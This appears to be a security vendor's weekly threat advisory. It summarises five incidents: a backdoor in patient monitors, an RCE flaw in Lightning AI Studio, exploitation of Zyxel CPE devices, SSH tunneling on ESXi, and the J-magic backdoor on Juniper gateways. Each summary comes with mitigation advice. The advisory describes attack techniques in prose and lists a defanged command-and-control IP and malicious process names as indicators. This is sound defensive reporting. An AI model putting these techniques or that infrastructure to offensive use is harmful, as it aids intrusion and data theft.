Backdoor in Patient Monitors Enables Data Theft, Remote Code Execution via Chinese IP

In the past week, critical cybersecurity threats have emerged, with significant vulnerabilities being reported across various platforms. Recent cybersecurity incidents highlight the growing sophistication of threats targeting critical systems. These include the discovery of a backdoor in Contec CMS8000 patient monitors, enabling unauthorized data theft and remote code execution via a Chinese IP, despite firmware updates. A critical RCE vulnerability in Lightning AI Studio (CVSS 9.4) exposed users to remote attacks, allowing unauthorized access through a hidden URL parameter before being patched in October 2024. Active exploitation of CVE-2024-40891 in Zyxel CPE devices has also been reported, with over 1,500 exposed systems targeted via Telnet for command injection attacks. Meanwhile, ransomware operators are exploiting VMware ESXi hypervisors by abusing SSH tunneling for stealth and persistence, emphasizing the importance of log centralization and proactive monitoring. Lastly, the J-magic malware campaign has been identified targeting Juniper VPN gateways, leveraging a custom backdoor and RSA-based challenge-response mechanisms to ensure exclusivity. These incidents underscore the need for robust cybersecurity measures to mitigate evolving threats. These developments underscore the urgent need for organizations to stay vigilant and apply security updates promptly.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

 

1. Backdoor in Patient Monitors Enables Data Theft, Remote Code Execution

CISA has identified a critical backdoor in Contec CMS8000 patient monitoring devices, which secretly transmits patient data to a remote Chinese IP and allows unauthorized remote code execution. Despite multiple firmware updates, the backdoor persists, with Contec failing to provide an effective fix. The vulnerability enables network access, allowing complete device takeover by mounting a remote NFS share and sending patient data over an unexpected port, indicating malicious intent. Given the lack of an official patch, CISA urges healthcare organizations to disconnect affected devices from networks immediately. Organizations should also monitor for anomalies such as unexpected data changes or unusual network activity, restrict network access to essential equipment, apply strict firewall rules, and conduct forensic analysis for signs of compromise. Exploring alternative vendors for patient monitoring solutions is advised, and raising awareness within healthcare institutions is crucial for mitigating risks associated with this threat.

2. Critical RCE Vulnerability in Lightning AI Studio Exposes Users to Remote Attacks

A critical vulnerability in Lightning AI Studio allowed remote code execution (RCE) with root privileges by exploiting a hidden URL parameter. Attackers could inject Base64-encoded commands, gaining unauthorized access, exfiltrating sensitive data, and manipulating system files. Particularly concerning, only a publicly available profile username was needed to craft an exploit. The issue, assigned a CVSS score of 9.4, was patched on October 25, 2024, following responsible disclosure. Users must update their environments immediately to mitigate risks. Organizations should also restrict URL access with strict controls, monitor logs for anomalies, and sanitize input parameters to prevent command injection. Additionally, limiting privileged execution in AI environments is crucial to reducing attack impact. This incident highlights the need for stronger security measures in AI model development platforms to prevent unauthorized access and data theft.

3. Unpatched Vulnerability in Zyxel CPE Devices Sparks Active Exploitation

A critical zero-day vulnerability (CVE-2024-40891) in Zyxel CPE Series devices is being actively exploited, enabling unauthenticated attackers to execute arbitrary commands via Telnet. Attack attempts, mainly from Taiwan, have targeted over 1,500 exposed devices. Similar to CVE-2024-40890, this command injection flaw allows remote attackers to take over systems, exfiltrate data, and move laterally across networks. First reported in July 2024 by VulnCheck, the vulnerability remains unpatched, with active exploitation traced to multiple IPs. Organizations should immediately restrict administrative access to trusted IPs, monitor traffic for unusual HTTP requests or Telnet activity, and isolate critical devices to enhance security. While awaiting Zyxel’s official patch, network segmentation can help limit exposure. This incident underscores the urgent need for proactive monitoring and security measures to mitigate risks associated with unpatched vulnerabilities in network infrastructure.

4. Ransomware Exploits ESXi Hypervisors via SSH Tunneling

Ransomware actors are increasingly targeting VMware ESXi hypervisors, leveraging SSH tunneling for persistence and stealth by exploiting vulnerabilities or compromised credentials. Due to visibility gaps in ESXi logs and limited SSH activity monitoring, attackers can move laterally, deploy ransomware, and disrupt virtualized environments. By abusing ESXi’s built-in SSH service, attackers establish backdoors using native SSH commands, ensuring prolonged access. The challenge lies in detecting malicious activity across multiple log files, as attackers often modify or clear logs to evade detection. Organizations must centralize ESXi logs via syslog forwarding and integrate them into SIEM solutions like SISA’s ProACT MXDR for real-time monitoring and advanced threat analysis. Disabling SSH when not needed, enforcing MFA, applying security patches, and monitoring critical logs for anomalies can help mitigate risks. Additionally, reviewing firewall configurations, conducting proactive threat hunting, and backing up ESXi configurations regularly are essential measures to ensure resilience against ransomware threats.

5. Stealthy J-magic Malware: A Custom Backdoor Targeting Juniper VPN Gateways

The J-magic malware campaign targets Juniper edge devices configured as VPN gateways, compromising critical sectors like semiconductor, energy, manufacturing, and IT. Active from mid-2023 to mid-2024, it employs a customized variant of the cd00r backdoor, passively monitoring network traffic for a “magic packet” to activate a reverse shell. To prevent unauthorized exploitation, J-magic incorporates an RSA-based challenge-response mechanism, ensuring only the intended attacker can use the backdoor. Communication with the Command-and-Control (C2) server (IP: 198.46.158[.]172) is secured via RSA encryption.

Key indicators of compromise (IoCs) include file hashes, the JunoscriptService file, and anomalous process names ([nfsiod 0], [nfsiod 1]). Organizations should block the known C2 IP, update firmware on Juniper devices, deploy endpoint detection tools, and monitor for unusual TCP traffic or RSA challenge-response activity. Immediate device quarantine and sharing IoCs with threat intelligence networks are essential to contain the threat and prevent further exploitation.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.

SISA’s Latest
close slider